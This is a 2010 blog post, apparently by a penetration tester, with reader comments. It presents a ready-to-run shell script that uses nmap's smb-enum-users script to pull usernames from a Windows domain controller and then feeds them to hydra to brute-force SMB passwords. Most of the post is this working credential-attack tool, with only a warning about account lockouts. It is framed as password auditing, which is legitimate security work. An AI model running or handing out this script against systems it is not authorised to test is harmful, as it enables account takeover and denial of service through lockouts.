Sunday, 26 September 2010

Fast password auditing with nmap and hydra

I have been spending a lot of time with some of the nmap scripts recently, particularly the smb-brute and enum-users scripts. These work fine but I wanted to be able to have my own custom password list which I could fine-tune according to the target company, and also to the UK (i.e. to include football teams, companyname123, etc).

The smb-enum-users script is the best way I've found to pull usernames from a domain controller, so this is a good place to start. However, the output requires a bit of cleaning before I can use it for piping into hydra. Yes, smb-brute will do most of this, but I wanted to have a bit more control on things.

After a few hours spent learning the grep, cut and sed commands, I finally managed to produce a fairly clean user list, without all the computer accounts and other characters that I didn't require. This is then piped into hydra with the correct parameters to produce a nice output of cracked accounts. A few lines later and it becomes a simple yet effective program with which to quickly audit domain accounts.

I am new to shell scripting, so I'm betting this could be done in a much better way. Anyway, let me know if you find it as useful as I do.

echo "*******************************************************"
echo "*                                                     *"
echo "*  Welcome to the Domain Account Bruteforce Tool.     *"
echo "*             By Sean gambles 21st Sep 2010           *"
echo "*******************************************************"
echo "This tool makes use of the nmap smb-enum-users script,"
echo "by basically exporting the results, in a cleaned up form"
echo "into hydra for bruteforcing."
echo "Currently, only working with server 2000, 2003 family."
echo "This is due to server 2008 not allowing unauthenticated"
echo "account enumeration."
echo "*** Please observe account lockout thresholds before"
echo "submitting your password file into this tool, as there"
echo "is no protection against lockouts taking place. ***"
read -p "Please enter the target server IP :" target
echo "Please enter the path to your password file"
read -p "E.g /root/passwords.txt :" passfile
echo "Enumerating users, please wait...."
nmap -p139,445 -n $target --script=smb-enum-users |grep Users |cut -d":" -f3 |tr "," "\n" |tr -d "^ " |grep -v
\\"$" >/tmp/users.txt
echo "The following accounts have been found:"
cat /tmp/users.txt
read -p "Press enter to start cracking the accounts."
echo "Trying passwords against all the user accounts, please wait...."
hydra $target smbnt -s445 -L /tmp/users.txt -P $passfile -t1 -e n -m D >/tmp/results.txt
rm /tmp/users.txt
echo "*********************************************************"
echo "Domain accounts found :"
cat /tmp/results.txt |grep login |cut -d" " -f6-11
rm /tmp/results.txt


  1. Awesome. I hope you'll publish an update on this.

  2. kind of forgot about this script, the nmap script output has been changed since I originally wrote this, which is why it wouldn't work.
    I have updated it, and it should be ok again now :0)

  3. Great article, you really are the Lord of the Hackers